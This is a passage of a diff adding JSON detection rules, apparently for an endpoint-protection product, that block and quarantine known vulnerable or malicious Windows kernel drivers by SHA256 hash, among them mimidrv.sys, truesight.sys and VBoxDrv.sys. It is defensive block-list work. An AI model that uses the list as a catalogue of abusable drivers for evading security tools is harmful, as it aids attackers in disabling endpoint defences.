+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457689Z",
+ "creation_date": "2026-03-23T11:45:30.457693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed617d4c50288921a6a760de19db1633bd8172421109dcf68082c67db085ddb1",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a8d2828-2537-581c-bdfe-f4453f0201c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477461Z",
+ "creation_date": "2026-03-23T11:45:30.477464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51480eebbbfb684149842c3e19a8ffbd3f71183c017e0c4bc6cf06aacf9c0292",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a8d88c5-83f7-5be6-b948-034701a6b94d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821217Z",
+ "creation_date": "2026-03-23T11:45:30.821220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "468b087a0901d7bd971ab564b03ded48c508840b1f9e5d233a7916d1da6d9bd5",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4a8e35bb-b29a-5e05-bdf6-58c86bee1328",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471076Z",
+ "creation_date": "2026-03-23T11:45:30.471079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "785723a3afe96876382524a9e90984f379c41521cd1f86a2172314ad58785e4f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4aae35d0-68bd-517a-bb7d-f2be35bb1a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618694Z",
+ "creation_date": "2026-03-23T11:45:29.618695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e1f20ceb2bfe9f38b50d6c997dbad032b2a79937ef6b3ce41b34bb74fbd24db",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4aaf35c8-e06b-5a48-9c23-80e82684ebfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985144Z",
+ "creation_date": "2026-03-23T11:45:29.985146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985152Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2b95fc91fe33c1995c49c35e32124ece7d958ed7d3b7a5f325f2a30454b9256",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ab6ba8b-c8cf-5c3c-947f-b5e3a126accc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153771Z",
+ "creation_date": "2026-03-23T11:45:31.153773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a044042ef9cb8e015981ce8d1d9853340acf7414d7d18a3ab7e480edcd90349",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ac3a019-1408-5e50-8d29-5a1e7d61a37d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143704Z",
+ "creation_date": "2026-03-23T11:45:31.143706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e391e12eb754d8cfe0e566c5ced36118048e963d8127e2333cd5fcb2f658622",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ac4afb1-8bf5-54d4-9d77-90cb894dbd91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608722Z",
+ "creation_date": "2026-03-23T11:45:29.608724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608732Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8aeed1480e8c4dd4a26a6717fb274ba36054000acb49e8423c20b5f2ebb3851a",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4af69396-f7d3-5d50-861b-bb35b60df45b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813806Z",
+ "creation_date": "2026-03-23T11:45:31.813809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02b8d6e0d3669fee150cd0a79d5413eb8ed3fd3ab5e70329e7f488be40d1d8a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b0b3a7a-d721-5ad4-9dc8-3d732f42ad0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819895Z",
+ "creation_date": "2026-03-23T11:45:30.819897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c8d7bb3a272afe7fb737bd165fe9bd8f8187f1835289eb66d471cdced74e950",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b152d9b-6592-53e9-91b4-a2083e2e26d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151160Z",
+ "creation_date": "2026-03-23T11:45:31.151162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "281ae0003e98de2f4b1a10255142ee54631e04b2b8a30f4ef3014a00d98a04aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b16ac1e-ae9e-5d2c-a45f-0763597a1dd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811292Z",
+ "creation_date": "2026-03-23T11:45:31.811294Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf50b862cc00efe4bbf7a707d7eaf70657ec0f6f127d0d462248497d19cdc583",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b177385-685d-50b7-8542-5806cc73b5a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605304Z",
+ "creation_date": "2026-03-23T11:45:29.605306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c029ac703913ff22930856aaeaf992f18a602f282c001252a1a8172ecb0b766",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b18c008-e0be-53cc-b712-bd8e6a86fab0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813914Z",
+ "creation_date": "2026-03-23T11:45:31.813916Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ca73650cd34c9701d64c67d9416c5cebf077607d24e2dddd5d98af25a966a5f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b20fba9-5f83-5d90-b3c2-4b6378790338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489854Z",
+ "creation_date": "2026-03-23T11:45:31.489858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46bc64031ea94d3cd93b0d2dcb90c38e90bdd27b4ffe2fc74b56a82a139aa3f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b3438f9-d5a2-5195-9384-83a6e1f61284",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820163Z",
+ "creation_date": "2026-03-23T11:45:31.820167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c97c503b95faa2aa2a4f2345396f81716343bcba32f05ed0a17e2b722ca62157",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b35bbc4-8e3b-5130-9c02-5dc9e8408b57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481384Z",
+ "creation_date": "2026-03-23T11:45:30.481388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "793a26c5c4c154a40f84c3d3165deb807062b26796acaae94b72f453e95230d5",
+ "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b3a0e87-5892-5fa4-b12c-f92f788f0acb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606368Z",
+ "creation_date": "2026-03-23T11:45:29.606370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e9922ff0332701c81667b2f34538ded46f1f42c4638c22da3834f3d86452c27",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b3fb118-81a4-5284-9bae-0e1af6952b42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984105Z",
+ "creation_date": "2026-03-23T11:45:29.984107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c748ae5dcc10614cc134064c99367d28f3131d1f1dda0c9c29e99279dc1bdd9",
+ "comment": "Vulnerable Kernel Driver (aka CupFixerx64.sys) [https://www.loldrivers.io/drivers/c98af16e-197f-4e66-bf94-14646bde32dd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b42c871-ff82-5b0e-a97c-052198bba4a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975711Z",
+ "creation_date": "2026-03-23T11:45:29.975714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcdf0eaf9c8effa2786c82e774974f1ef4098dcd376461bad37fd4168dcab52b",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b51ff34-a070-5c0d-afbc-801b7f4e42f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605102Z",
+ "creation_date": "2026-03-23T11:45:29.605104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7b1bb39dcd7f0331989f16fcc7cd29a9ae126bee47746a4be385160da3c5a29",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4b587255-617f-5ebf-9419-0811f20c50ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481204Z",
+ "creation_date": "2026-03-23T11:45:30.481206Z",
+ "enabled": true,
